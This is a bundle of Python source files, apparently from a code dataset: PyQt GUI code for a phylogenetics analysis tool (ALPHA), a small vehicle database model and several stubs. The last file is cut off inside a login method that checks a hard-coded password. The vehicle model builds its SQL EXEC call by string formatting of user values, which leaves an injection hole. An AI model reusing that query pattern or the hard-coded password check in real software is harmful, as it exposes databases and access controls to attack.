"""This class will hold buttons and checkboxes
to specify parameters as inputs to the program
Arguments:
QDialog {[Class]} -- PyQt parent class
"""
def __init__(self, parent):
QDialog.__init__(self)
self.parent = parent
self.layout = QGridLayout()
self.rangeSlider = QRangeSlider()
self.rangeSlider.setRange(2001,2015)
self.rangeSlider.setMin(2001)
self.rangeSlider.setMax(2015)
self.TNE = QPushButton("Top Named Entities", self)
self.TNE.setCheckable(True)
self.TNE.setChecked(False)
self.TNE.setStatusTip("Runs Top Named entities algorithm")
self.SA = QPushButton("Sentiment Analysis", self)
self.SA.setCheckable(True)
self.SA.setChecked(False)
self.SA.setStatusTip("Runs Sentiment Analysis algorithm")
self.LDA = QPushButton("LDA", self)
self.LDA.setCheckable(True)
self.LDA.setChecked(False)
self.LDA.setStatusTip("Runs LDA algorithm")
self.TC = QPushButton("Top Co-occurences", self)
self.TC.setCheckable(True)
self.TC.setChecked(False)
self.TC.setStatusTip("Runs Top Co-occurences algorithm")
self.TD = QPushButton("Top Diseases", self)
self.TD.setCheckable(True)
self.TD.setChecked(False)
self.TD.setStatusTip("Runs Top Diseases algorithm")
self.executeBTN = QPushButton("Execute Selected")
self.executeBTN.clicked.connect(self.executeSelected)
self.executeBTN.setStatusTip("Executes Selected algorithms")
self.layout.addWidget(self.rangeSlider, 0, 0, Qt.AlignTop)
self.layout.addWidget(self.TNE, 1,0)
self.layout.addWidget(self.SA , 2, 0)
self.layout.addWidget(self.LDA , 3, 0)
self.layout.addWidget(self.TC , 4, 0)
self.layout.addWidget(self.TD , 5, 0)
self.layout.addWidget(self.executeBTN, 6, 0)
self.setLayout(self.layout)
def executeSelected(self):
rangeMin, rangeMax = self.rangeSlider.getRange()
print(rangeMin, " ", rangeMax)
self.dataAll = dict()
if(self.TNE.isChecked()):
self.executeTNE(rangeMin, rangeMax, self.dataAll)
if(self.SA.isChecked()):
self.executeSA(rangeMin, rangeMax, self.dataAll)
if(self.LDA.isChecked()):
self.executeLDA(rangeMin, rangeMax, self.dataAll)
if(self.TC.isChecked()):
self.executeTC(rangeMin, rangeMax, self.dataAll)
if(self.TD.isChecked()):
self.executeTD(rangeMin, rangeMax, self.dataAll)
# if (not len(self.dataAll)):
# return
# else:
# self.dataViewer = viewer.viewer(self)
# self.setCentralWidget(self.dataViewer)
# self.setWindowTitle("Results Viewer")
return
###########################################################################
def executeTNE(self, rangeMin, rangeMax, dataOutDict):
print("TNE activated")
## data should be a list of tuples, where each tuple is (string, int)
# data = main.histogramNER()
# dataOutDict['TNE'] = data
return
def executeSA(self, rangeMin, rangeMax, dataOutDict):
print("SA activated")
## data should be a list of tuples, where each tuple is (int, int)
# data = main.getSent()
# dataOutDict['SA'] = data
return
def executeLDA(self, rangeMin, rangeMax, dataOutDict):
print("LDA activated")
## data should be a string
# data = main.getTopic()
# dataOutDict['LDA'] = data
return
def executeTC(self, rangeMin, rangeMax, dataOutDict):
print("TC activated")
## data is a list of tuples, where each tuple is (string, int)
# data = main.mostCooccuring()
# dataOutDict['TC'] = data
return
def executeTD(self, rangeMin, rangeMax, dataOutDict):
## TODO
print("TD activated")
print("Future work: not yet designed.")
return
|
StarcoderdataPython
|
5122982
|
from app.model.Base import selectDB, insertBD
class Vehiculo():
@staticmethod
def listaVehiculos(idPersona):
data = selectDB("SELECT * FROM Vehiculo")
return recorrerResultados(data)
@staticmethod
def createVehiculo(marca, idPersona, idTipo):
query = "EXEC spCrearVehiculo @Marca = '{}', @IdPersona = {}, @IdTipo = {}".format(marca, idPersona, idTipo)
insertBD(query)
def recorrerResultados(data):
array = []
for row in data:
resultados = {}
resultados.update({"IdVehiculo": row["IdVehiculo"]})
resultados.update({"Marca": row["Marca"]})
resultados.update({"IdPersona": row["IdPersona"]})
resultados.update({"IdTipo": row["IdTipo"]})
array.append(resultados)
return array
|
StarcoderdataPython
|
12855686
|
<reponame>ShubhamAnandJain/MWP-CS229
from __future__ import absolute_import
from __future__ import print_function
from __future__ import division
from mwptoolkit.module.Encoder import graph_based_encoder,rnn_encoder,transformer_encoder
|
StarcoderdataPython
|
1865395
|
# this module provide methods to search on various search engines and return parsed results
# later we may add proxy pool to avoid search engine ban
# we may also use boost method to jointly use search results from different search engines
|
StarcoderdataPython
|
8002914
|
<filename>main.py
# utilities
import sip, sys, os, re, webbrowser
sip.setapi('QString', 2)
from PyQt4 import QtGui, QtCore
from functools import partial
# GUI
from raxmlOutputWindows import allTreesWindow, donutPlotWindow, scatterPlotWindow, pgtstWindow, robinsonFouldsWindow, heatMapWindow, bootstrapContractionWindow, dStatisticWindow, msRobinsonFouldsWindow, msPercentMatchingWindow, msTMRCAWindow, windowsToInfSitesWindow, lStatisticWindow
from module import gui_layout as gui
# logic
from module import RAxMLOperations as ro
from module import topologyPlots as tp
from module import statisticCalculations as sc
from module import fileConverterController as fc
from module import informativeSites as infSites
from module import bootstrapContraction as bc
from module import msComparison as ms
from module import plotter as p
from module import CalculateGeneralizedDStatisticClass as gd
from module import RunSW as sw
class PhyloVisApp(QtGui.QMainWindow, gui.Ui_PhylogeneticVisualization):
def __init__(self, parent=None):
super(PhyloVisApp, self).__init__(parent)
# remove any leftover files from previous raxml trials
badFileNames = ['RAxML_result', 'RAxML_randomTree', 'RAxML_log', 'RAxML_info', 'RAxML_bestTree', 'RAxML_bipartitions', 'RAxML_bipartitionsBranchLabels', 'RAxML_bootstrap']
for fileName in os.listdir('.'):
nameWithoutExtension = os.path.splitext(fileName)[0]
for file in badFileNames:
if nameWithoutExtension == file:
os.remove(fileName)
# if 'plots' folder doesn't exist -> create it
if not os.path.isdir('plots'):
os.mkdir('plots')
# remove all files in plots folder
for fileName in os.listdir('plots'):
os.remove('plots/' + fileName)
# initialize gui_layout
self.setupUi(self)
# set UI style -- options: u'Windows', u'Motif', u'CDE', u'Plastique', u'Cleanlooks', u'Macintosh (aqua)'
QtGui.QApplication.setStyle(QtGui.QStyleFactory.create(u'Macintosh (aqua)'))
self.dStatisticTaxonComboBoxes = [self.dTaxonComboBox1, self.dTaxonComboBox2, self.dTaxonComboBox3, self.dTaxonComboBox4]
self.raxmlTaxonComboBoxes = [self.outgroupComboBox]
self.speciesTreeComboBoxes = [self.speciesTreeComboBox]
# moves menu bar into application -- mac only windows sux
self.menubar.setNativeMenuBar(False)
# set GUI icon
self.setWindowIcon(QtGui.QIcon('imgs/alphaLogo.png'))
# self.welcomeLogoImage.setScaledContents(True)
self.welcomeLogoImage.setPixmap(QtGui.QPixmap('imgs/alphaLogo.png'))
# create new instance of RaxmlOperations class
self.raxmlOperations = ro.RAxMLOperations()
# create new instance of TopologyPlotter class
self.topologyPlotter = tp.TopologyPlotter()
# create new instance of Statistics Calculations class
self.statisticsCalculations = sc.StatisticsCalculations()
# create new instance of Informative Sites class
self.informativeSites = infSites.InformativeSites()
# create new instance of BootstrapContraction class
self.bootstrapContraction = bc.BootstrapContraction()
# create new instance of MsComparison class
self.msComparison = ms.MsComparison()
# create new instance of FileConverter class
self.fileConverter = fc.FileConverter()
# create new instance of Plotter class
self.plotter = p.Plotter()
# create new instance of CalculateGeneralizedDStatisticClass class
self.calcGenD = gd.CalculateGeneralizedDStatisticClass()
# create new instance of RunSW class
self.calcSW = sw.RunSW()
self.topologyPlotter.num = None
# ADD NEW PAGE INFORMATION BELOW
# mapping from: windows --> page index
self.windows = {'welcomePage': 0, 'inputPageRax': 1, 'inputPageFileConverter': 2, 'inputPageMS': 3, 'inputPageDStatistic': 4, 'inputPageLStatistic': 5, 'inputPageSmoothWinds': 6}
# mapping from: windows --> dictionary of page dimensions
self.windowSizes = {'welcomePage': {'x': 459, 'y': 245}, 'inputPageRax': {'x': 700, 'y': 700}, 'inputPageFileConverter': {'x': 459, 'y': 403}, 'inputPageMS': {'x': 600, 'y': 746}, 'inputPageDStatistic': {'x': 600, 'y': 600}, 'inputPageLStatistic': {'x': 800, 'y': 900}, 'inputPageSmoothWinds': {'x': 759, 'y': 403}}
# mapping from: windows --> dictionary of page dimensions
self.windowLocations = {'welcomePage': {'x': 600, 'y': 300}, 'inputPageRax': {'x': 500, 'y': 175}, 'inputPageFileConverter': {'x': 600, 'y': 300}, 'inputPageMS': {'x': 520, 'y': 100}, 'inputPageDStatistic': {'x': 500, 'y': 175}, 'inputPageLStatistic': {'x': 450, 'y': 75}, 'inputPageSmoothWinds': {'x': 800, 'y': 300}}
# mapping from: mode --> page
self.comboboxModes_to_windowNames = {'RAx_ML': 'inputPageRax', 'File Converter': 'inputPageFileConverter', 'MS Comparison': 'inputPageMS', 'D Statistic': 'inputPageDStatistic', 'Generalized D Statistic': 'inputPageLStatistic', 'Smooth Winds': 'inputPageSmoothWinds'}
# mapping from: mode --> menu action
self.comboboxModes_to_actionModes = {'RAx_ML': self.actionRax, 'File Converter': self.actionConverter, 'MS Comparison': self.actionMS, 'D Statistic': self.actionDStatistic, 'Generalized D Statistic': self.actionLStatistic, 'Smooth Winds': self.actionSmooth_Winds}
# if users os is windows, use different sizes for each page
if sys.platform == 'win32':
self.windowSizes = {'welcomePage': {'x': 459, 'y': 245}, 'inputPageRax': {'x': 925, 'y': 688}, 'inputPageFileConverter': {'x': 630, 'y': 375}, 'inputPageMS': {'x': 675, 'y': 815}, 'inputPageDStatistic': {'x': 600, 'y': 570}, 'inputPageLStatistic': {'x': 600, 'y': 570}, 'inputPageSmoothWinds': {'x': 630, 'y': 375}}
# ADD NEW PAGE INFORMATION ABOVE
# set of previously generated RAxML Figures
self.prevGeneratedFigures = set()
# default values
self.runComplete = False
self.genDRunComplete = False
self.checkboxWeighted.setEnabled(False)
self.outgroupComboBox.setEnabled(False)
self.outgroupLabel.setEnabled(False)
self.bootstrapGroupBox.setEnabled(False)
self.outgroupGroupBox.setEnabled(False)
self.speciesTreeOutGroupGroupBox.setEnabled(False)
self.dStatisticLabel.setEnabled(False)
self.speciesTreeRaxmlCommandEntry.setEnabled(False)
self.customRaxmlCommandEntry.setEnabled(False)
self.progressBar.reset()
self.generateSpeciesTreeProgressBar.reset()
self.rooted = False
self.stackedWidget.setCurrentIndex(0)
self.raxmlToolBox.setCurrentIndex(0)
self.raxmlOptionsTabWidget.setCurrentIndex(0)
self.lOutputStacked.setCurrentIndex(0)
self.lAlignmentTypeStacked.setCurrentIndex(0)
self.resize(self.windowSizes['welcomePage']['x'], self.windowSizes['welcomePage']['y'])
self.outputFileConverterEntry.setText(os.getcwd())
self.heatmapPercentage.setText("100")
# open documentation
self.actionDocumentation.triggered.connect(lambda: self.openURL('https://github.com/chilleo/ALPHA'))
# only allow integers in the following fields
self.setValidator(self.windowSizeEntry, 'Int')
self.setValidator(self.windowOffsetEntry, 'Int')
self.setValidator(self.numberOfTopTopologiesEntry, 'Int')
self.setValidator(self.confidenceLevelEntry, 'Int')
self.setValidator(self.numberOfBootstrapsEntry, 'Int')
self.setValidator(self.msWindowSizeEntry, 'Int')
self.setValidator(self.msWindowOffsetEntry, 'Int')
self.setValidator(self.dWindowSizeEntry, 'Int')
self.setValidator(self.dWindowOffsetEntry, 'Int')
# **************************** CHANGE MODE ****************************#
# selecting a mode in the menu bar -> deselects all other modes first
# change the input mode based on which mode is selected in the menu bar
self.actionRax.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionRax, 'inputPageRax'))
self.actionConverter.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionConverter, 'inputPageFileConverter'))
self.actionMS.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionMS, 'inputPageMS'))
self.actionDStatistic.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionDStatistic, 'inputPageDStatistic'))
self.actionLStatistic.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionLStatistic, 'inputPageLStatistic'))
self.actionSmooth_Winds.triggered.connect(lambda: self.ensureSingleModeSelected(self.actionSmooth_Winds, 'inputPageSmoothWinds'))
# triggers select file dialogs
self.inputFileBtn.clicked.connect(lambda: self.getFileName(self.inputFileEntry))
self.newickFileBtn.clicked.connect(lambda: self.getFileName(self.newickFileEntry))
# toggle what inputs are actionable based on checkboxes
self.checkboxRobinsonFoulds.clicked.connect(lambda: self.toggleEnabled(self.checkboxWeighted))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupComboBox))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupLabel))
self.checkboxBootstrap.stateChanged.connect(lambda: self.toggleEnabled(self.bootstrapGroupBox))
self.checkboxRooted.stateChanged.connect(lambda: self.toggleEnabled(self.outgroupGroupBox))
self.checkBoxCustomRaxml.stateChanged.connect(lambda: self.toggleEnabled(self.customRaxmlCommandEntry))
self.checkboxSpeciesTreeRooted.stateChanged.connect(lambda: self.toggleEnabled(self.speciesTreeOutGroupGroupBox))
self.checkboxSpeciesTreeUseCustomRax.stateChanged.connect(lambda: self.toggleEnabled(self.speciesTreeRaxmlCommandEntry))
# enable / disable save location (now you always have save location so commented)
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileBtn))
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileEntry))
#self.lStatisticFileCB.stateChanged.connect(lambda: self.toggleEnabled(self.lStatisticFileLabel))
# now these are enabled by default
self.lStatisticFileBtn.setEnabled(True)
self.lStatisticFileEntry.setEnabled(True)
self.lStatisticFileLabel.setEnabled(True)
#self.lStatistic.setText("Hi")
self.lStatisticFileCB.setChecked(True)
self.heatmapGenerate.clicked.connect(self.generateHeatmap)
self.generateFiguresBtn.clicked.connect(self.generateFigures)
# RAxML Events
self.connect(self.inputFileEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.raxmlTaxonComboBoxes, self.inputFileEntry))
self.connect(self.inputFileEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.speciesTreeComboBoxes, self.inputFileEntry))
self.connect(self.raxmlOperations, QtCore.SIGNAL('RAX_PER'), self.progressBar.setValue)
self.connect(self.raxmlOperations, QtCore.SIGNAL('RAX_COMPLETE'), self.raxmlComplete)
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_PER'), self.generateSpeciesTreeProgressBar.setValue)
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_COMPLETE'), partial(self.message, type='Err'))
self.connect(self.raxmlOperations, QtCore.SIGNAL('SPECIES_TREE_COMPLETE_RETURN_ST'), self.speciesTreeEntry.setText)
self.connect(self.raxmlOperations, QtCore.SIGNAL('INVALID_ALIGNMENT_FILE'), lambda: self.message('Invalid File', 'Invalid alignment file. Please choose another.', 'Make sure your file has 4 sequences and is in the phylip-relaxed format.', type='Err'))
# run RAX_ML and generate graphs
self.runBtn.clicked.connect(self.runRAxML)
self.generateSpeciesTreeBtn.clicked.connect(self.generateSpeciesTree)
# **************************** WELCOME PAGE ****************************#
self.launchBtn.clicked.connect(self.initializeMode)
# **************************** CONVERTER PAGE ****************************#
self.fileTypeDocumentationBtn.clicked.connect(lambda: self.openURL('http://biopython.org/wiki/AlignIO'))
self.fileConverterBtn.clicked.connect(lambda: self.getFileName(self.fileConverterEntry))
self.outputFileConverterBtn.clicked.connect(lambda: self.openDirectory(self.outputFileConverterEntry))
self.runFileConverterBtn.clicked.connect(lambda: self.convertFile())
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_COMPLETE'), lambda: self.fileConverterProgressBar.setValue(100))
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_COMPLETE'), self.message)
self.connect(self.fileConverter, QtCore.SIGNAL('FILE_CONVERTER_ERR'), self.message)
# **************************** MS PAGE **************************** #
self.msCompareBtn.clicked.connect(self.runMSCompare)
self.msFileBtn.clicked.connect(lambda: self.getFileName(self.msFileEntry))
self.msSecondFileBtn.clicked.connect(lambda: self.getFileName(self.msSecondFileEntry))
self.connect(self.msComparison, QtCore.SIGNAL('MS_COMPLETE'), self.plotMSCompare)
self.connect(self.msComparison, QtCore.SIGNAL('MS_PER'), self.msProgressBar.setValue)
self.connect(self.msComparison, QtCore.SIGNAL('MS_ERR'), self.message)
self.checkboxCompareAgainstMS.clicked.connect(lambda: self.toggleEnabled(self.msMSCompareGroupBox))
self.checkboxCompareAgainstRaxml.clicked.connect(lambda: self.toggleEnabled(self.msRaxmlCompareGroupBox))
self.msRaxmlDirectoryBtn.clicked.connect(lambda: self.openDirectory(self.msRaxmlDirectoryEntry))
# dynamically add more file entries
self.msUploadAnother.clicked.connect(lambda: self.addFileEntry('msAdditionalFileHorizontalLayout', 'msAdditionalFileEntry', 'msAdditionalFileBtn', 'msRemoveFileBtn'))
# **************************** D STATISTIC PAGE **************************** #
# set background image
self.imagePixmap = QtGui.QPixmap('imgs/tree.png')
self.imageLabel.setScaledContents(True)
self.imageLabel.setPixmap(self.imagePixmap)
# select alignment for d statistic
self.dAlignmentBtn.clicked.connect(lambda: self.getFileName(self.dAlignmentEntry))
# when file entry text is changed
self.connect(self.dAlignmentEntry, QtCore.SIGNAL("FILE_SELECTED"), lambda: self.updateTaxonComboBoxes(self.dStatisticTaxonComboBoxes, self.dAlignmentEntry, require4Taxons=True))
# update progress bar
self.connect(self.statisticsCalculations, QtCore.SIGNAL('D_PER'), self.dProgressBar.setValue)
self.connect(self.statisticsCalculations, QtCore.SIGNAL('D_FINISHED'), self.displayDStatistic)
# run
self.dRunBtn.clicked.connect(self.runDStatistic)
self.connect(self.statisticsCalculations, QtCore.SIGNAL('INVALID_ALIGNMENT_FILE'), partial(self.message, type='Err'))
# **************************** L STATISTIC PAGE **************************** #
# set default L-statistic page to ask for password
#self.lStatisticStackedWidget.setCurrentIndex(0)
#self.lStatLoginBtn.clicked.connect(lambda: self.login(self.lStatPasswordLineEdit.text()))
#not asking for password any more, just set current index to 1
self.lStatisticStackedWidget.setCurrentIndex(1)
# list of combo boxes containing the taxa from the alignment for the L statistic
self.lStatisticSourceComboBoxes = [ self.reticulationSource0 ]
self.lStatisticTargetComboBoxes = [ self.reticulationTarget0 ]
self.additionalAlignmentEntries = [ self.lAlignmentEntry ]
# newick string for species tree
self.lSpeciesTree = ""
# select alignment and species tree for L statistic
self.lAlignmentBtn.clicked.connect(lambda: self.getFileName(self.lAlignmentEntry))
self.lAlignmentDirBtn.clicked.connect(lambda: self.openDirectory(self.lAlignmentDirEntry))
self.lSpeciesTreeBtn.clicked.connect(lambda: self.getFileName(self.lSpeciesTreeEntry))
self.lStatisticFileBtn.clicked.connect(lambda: self.getFileName(self.lStatisticFileEntry))
self.saveDirButton.clicked.connect(lambda: self.openDirectory(self.lStatSaveLocation))
self.calcGenD.plot = False
self.calcGenD.meta = ""
# when an alignment is selected update the combo boxes
self.connect(self.lAlignmentEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.lStatisticSourceComboBoxes, self.lAlignmentEntry))
self.connect(self.lAlignmentEntry, QtCore.SIGNAL('FILE_SELECTED'), lambda: self.updateTaxonComboBoxes(self.lStatisticTargetComboBoxes, self.lAlignmentEntry))
# when an species tree is selected update the graph
self.connect(self.lSpeciesTreeEntry, QtCore.SIGNAL('FILE_SELECTED'), self.updateLTree)
# dynamically add more reticulations
self.lStatisticAddReticulationBtn.clicked.connect(self.addReticulationComboBox)
# dynamically add more file entries
self.lStatisticAddAlignmentBtn.clicked.connect(self.addAlignmentEntry)
# scroll all the way to the bottom every time you add an alignment or reticulation
self.connect(self.reticulationScrollArea.verticalScrollBar(), QtCore.SIGNAL("rangeChanged(int,int)"), lambda: self.reticulationScrollArea.verticalScrollBar().setValue(self.reticulationScrollArea.verticalScrollBar().maximum()))
self.connect(self.lAlignmentScrollArea.verticalScrollBar(), QtCore.SIGNAL("rangeChanged(int,int)"), lambda: self.lAlignmentScrollArea.verticalScrollBar().setValue(self.lAlignmentScrollArea.verticalScrollBar().maximum()))
self.runGenDStatBtn.clicked.connect(self.runGenD2)
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_COMPLETE'), self.genDComplete)
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_10'), lambda: self.lProgressBar.setValue(10))
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_50'), lambda: self.lProgressBar.setValue(50))
self.connect(self.calcGenD, QtCore.SIGNAL('GEN_D_100'), lambda: self.lProgressBar.setValue(100))
self.viewVerboseOutputBtn.clicked.connect(lambda: self.lOutputStacked.setCurrentIndex(1))
self.viewRegularOutputBtn.clicked.connect(lambda: self.lOutputStacked.setCurrentIndex(0))
self.lUseDirCB.stateChanged.connect(lambda: self.lAlignmentTypeStacked.setCurrentIndex(1 if self.lUseDirCB.isChecked() else 0))
self.connect(self.calcGenD, QtCore.SIGNAL('L_FINISHED'), self.displayLStatistic)
self.connect(self.calcGenD, QtCore.SIGNAL('DGEN2_FINISHED'), self.displayDGEN2)
# **************************** SMOOTHWINDS PAGE **************************** #
# update progress bar
self.connect(self.calcSW, QtCore.SIGNAL('SW_UPDATE'), self.displaySW)
# button click
self.btnSmoothWinds.clicked.connect(self.runSW)
# **************************** WELCOME PAGE **************************** #
def initializeMode(self):
self.ensureSingleModeSelected(self.comboboxModes_to_actionModes[self.modeComboBox.currentText()], self.comboboxModes_to_windowNames[self.modeComboBox.currentText()])
# **************************** D STATISTIC PAGE **************************** #
def runDStatistic(self):
try:
self.statisticsCalculations.dAlignment = self.checkEntryPopulated(self.dAlignmentEntry, errorTitle='Missing Alignment', errorMessage='Please select and alignment.')
self.statisticsCalculations.dWindowSize = self.checkEntryInRange(self.dWindowSizeEntry, min=0, inclusive=False, errorTitle='Invalid Window Size', errorMessage='Window size needs to be a positive integer.')
self.statisticsCalculations.dWindowOffset = self.checkEntryInRange(self.dWindowOffsetEntry, min=0, inclusive=False, errorTitle='Invalid Window Offset', errorMessage='Window offset needs to be a positive integer.')
self.statisticsCalculations.taxons = [self.dTaxonComboBox1.currentText(), self.dTaxonComboBox2.currentText(), self.dTaxonComboBox3.currentText(), self.dTaxonComboBox4.currentText()]
except ValueError, (ErrorTitle, ErrorMessage, ErrorDescription):
self.message(str(ErrorTitle), str(ErrorMessage), str(ErrorDescription))
return
self.statisticsCalculations.start()
def displayDStatistic(self, dVal, dWindows):
self.dVal = dVal
self.dWindows = dWindows
self.dStatisticWindow = dStatisticWindow.DStatisticWindow(self.dWindows)
self.dStatisticValueLabel.setText(str(self.dVal))
self.dStatisticLabel.setEnabled(True)
self.dStatisticValueLabel.setEnabled(True)
# **************************** L STATISTIC PAGE **************************** #
additionalReticulationCounter = 0
additionalAlignmentCounter = 0
def genDValidInput(self):
self.calcGenD.r = self.getReticulations()
self.calcGenD.alignments = self.getAlignments()
self.calcGenD.window_size = int(self.lWindowSizeEntry.text().encode('utf-8'))
self.calcGenD.window_offset = int(self.lWindowOffsetEntry.text().encode('utf-8'))
self.calcGenD.verbose = True
self.calcGenD.alpha = 0.01
self.calcGenD.alpha = float(self.lAlphaEntry.text().encode('utf-8'))
self.calcGenD.save = True
self.calcGenD.useDir = self.lUseDirCB.isChecked()
self.calcGenD.directory = ""
self.calcGenD.o = self.lineEdit.text().encode('utf-8')
self.calcGenD.use_inv = self.checkBox.isChecked()
self.calcGenD.save_location = "DGenStatistic_"
if self.lStatSaveLocation.text().encode('utf-8') != "":
self.calcGenD.save_location = self.lStatSaveLocation.text().encode('utf-8')
if self.lSpeciesTreeEntry.text().encode('utf-8') != "":
self.calcGenD.species_tree = self.getLSpeciesTree()
else:
self.calcGenD.species_tree = self.lSpeciesTreeNewickEntry.text().encode('utf-8')
if self.lUseDirCB.isChecked():
self.calcGenD.directory = self.lAlignmentDirEntry.text().encode('utf-8')
self.calcGenD.statistic = False
#changed. now i always require the statistic save location, but i have a new bool to set
self.calcGenD.useAlreadyGeneratedStat = False
if self.lStatisticFileCB.isChecked():
self.calcGenD.useAlreadyGeneratedStat = True
self.calcGenD.statistic = self.lStatisticFileEntry.text().encode('utf-8')
self.calcGenD.generatePlot = self.generatePlotCB.isChecked()
return True
def runGenD(self):
# if all error handling passes run RAxML
if self.genDValidInput():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.genDRunComplete:
rerun = self.question("Rerun Generalized D Statistic?", "Are you sure you want to rerun generalized d-statistic?")
# if the user selected the 'ok' button
if rerun == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.calcGenD.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.calcGenD.start()
def runGenD2(self):
# if all error handling passes run RAxML
if self.genDValidInput():
# if rax has been run previously, ask the user to confirm that they want to rerun
if self.genDRunComplete:
rerun = self.question("Rerun Generalized D Statistic?", "Are you sure you want to rerun generalized d-statistic?")
# if the user selected the 'ok' button
if rerun == QtGui.QMessageBox.Yes:
# start raxml operations thread
self.calcGenD.start()
# if raxml hasn't been run before just run it
else:
# start raxml operations thread
self.calcGenD.start()
def runSW(self):
#get stuff
# get text stuff
self.calcSW.sequencePathText = self.entrySequencePath.text().encode('utf-8')
self.calcSW.sequenceLengthFloat = int(self.entrySequenceLength.text().encode('utf-8'))
self.calcSW.windowSizeFloat = int(self.entryWindowSize.text().encode('utf-8'))
self.calcSW.windowOffsetFloat = int(self.entryWindowOffset.text().encode('utf-8'))
# starts it
self.calcSW.start()
def genDComplete(self):
self.runGenDStatBtn.setText("Rerun")
self.lProgressBar.setValue(100)
self.genDRunComplete = True
def addAlignmentEntry(self):
self.additionalAlignmentCounter += 1
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName("alignment_hl" + str(self.additionalAlignmentCounter))
# create btn to remove and add to horizontal layout
btn = QtGui.QToolButton()
btn.setObjectName("removeAlignmentBtn" + str(self.additionalAlignmentCounter))
btn.setText('-')
btn.setFixedHeight(21)
btn.setFixedWidth(23)
HL.addWidget(btn)
# create text entry and add to horizontal layout
entry = QtGui.QLineEdit()
entry.setReadOnly(True)
entry.setObjectName("alignmentEntry" + str(self.additionalFileCounter))
HL.addWidget(entry)
# create btn and add to horizontal layout
btn2 = QtGui.QToolButton()
btn2.setObjectName("alignmentBtn" + str(self.additionalFileCounter))
btn2.setText('...')
HL.addWidget(btn2)
self.alignmentParentVL.addLayout(HL)
self.additionalAlignmentEntries.append(entry)
btn.clicked.connect(lambda: self.removeFileEntry(HL, entry, btn, btn2))
btn2.clicked.connect(lambda: self.getFileName(entry))
def addReticulationComboBox(self):
self.additionalReticulationCounter += 1
# create horizontal layout
HL = QtGui.QHBoxLayout()
HL.setObjectName("reticulation_hl" + str(self.additionalReticulationCounter))
# create btn to remove and add to horizontal layout
btn = QtGui.QToolButton()
btn.setObjectName("removeReticulationBtn" + str(self.additionalReticulationCounter))
btn.setText('-')
btn.setFixedHeight(21)
btn.setFixedWidth(23)
HL.addWidget(btn)
# create combo box and add to horizontal layout
sourceComboBox = QtGui.QComboBox()
sourceComboBox.setObjectName("reticulationSource" + str(self.additionalReticulationCounter))
HL.addWidget(sourceComboBox)
# create label "=>" and add to horizontal layout
arrowLabel = QtGui.QLabel()
arrowLabel.setObjectName("arrow" + str(self.additionalReticulationCounter))
arrowLabel.setText("=>")
HL.addWidget(arrowLabel)
# create combo box and add to horizontal layout
targetComboBox = QtGui.QComboBox()
targetComboBox.setObjectName("reticulationTarget" + str(self.additionalReticulationCounter))
HL.addWidget(targetComboBox)
# create horizontal spacer and add to horizontal layout
hSpacer = QtGui.QSpacerItem(40, 20, QtGui.QSizePolicy.Expanding, QtGui.QSizePolicy.Minimum)
HL.addItem(hSpacer)
# self.resize(self.width(), self.height() + 30)
self.reticulationComboBoxParentVL.addLayout(HL)
self.lStatisticSourceComboBoxes.append(sourceComboBox)
self.lStatisticTargetComboBoxes.append(targetComboBox)
# if an alignment has already been selected, populate any new reticulation boxes with the taxa from the alignment
if self.lAlignmentEntry.text() != "":
self.updateTaxonComboBoxes([sourceComboBox, targetComboBox], self.lAlignmentEntry)
btn.clicked.connect(lambda: self.removeReticulationComboBox(HL, sourceComboBox, arrowLabel, targetComboBox, btn, hSpacer))
def removeReticulationComboBox(self, HL, sourceComboBox, arrow, targetComboBox, btn, hSpacer):
HL.deleteLater()
sourceComboBox.deleteLater()
arrow.deleteLater()
targetComboBox.deleteLater()
btn.deleteLater()
# self.resize(self.width(), self.height() - 30)
self.lStatisticSourceComboBoxes.remove(sourceComboBox)
self.lStatisticTargetComboBoxes.remove(targetComboBox)
def getLSpeciesTree(self):
# read the species tree
with open(self.lSpeciesTreeEntry.text(), 'r') as stf:
st = stf.read().replace('\n', '')
return st
def updateLTree(self):
# read the species tree
with open(self.lSpeciesTreeEntry.text(), 'r') as stf:
self.lSpeciesTree = stf.read().replace('\n', '')
# Regular expression for identifying floats
# float_pattern = "([+-]?\\d*\\.\\d+)(?![-+0-9\\.])"
# remove branch lengths
# self.lSpeciesTree = ((re.sub(float_pattern, '', self.lSpeciesTree)).replace(":", "")).replace("\n", "")
# generate new image
self.plotter.treeImage(self.lSpeciesTree) # rooted=True, outgroup="O"
# set background image
self.lImagePixmap = QtGui.QPixmap('imgs/LStatisticTree.png')
self.lImageLabel.setScaledContents(True)
self.lImageLabel.setPixmap(self.lImagePixmap)
def getReticulations(self):
"""
Output:
a list of tuples (a,b) where a is the source taxa and b is the target taxa of the reticulation
"""
sourceNodes = [cb.currentText().encode('utf-8') for cb in self.lStatisticSourceComboBoxes]
targetNodes = [cb.currentText().encode('utf-8') for cb in self.lStatisticTargetComboBoxes]
return [(sourceNodes[i], targetNodes[i]) for i in range(len(sourceNodes))]
def getAlignments(self):
"""
Output: a list of alignments
"""
return [entry.text().encode('utf-8') for entry in self.additionalAlignmentEntries]
def login(self, password):
"""
If the password is correct, displays l-statistic page.
Otherwise, displays appropriate error message.
"""
if (password == "<PASSWORD>"):
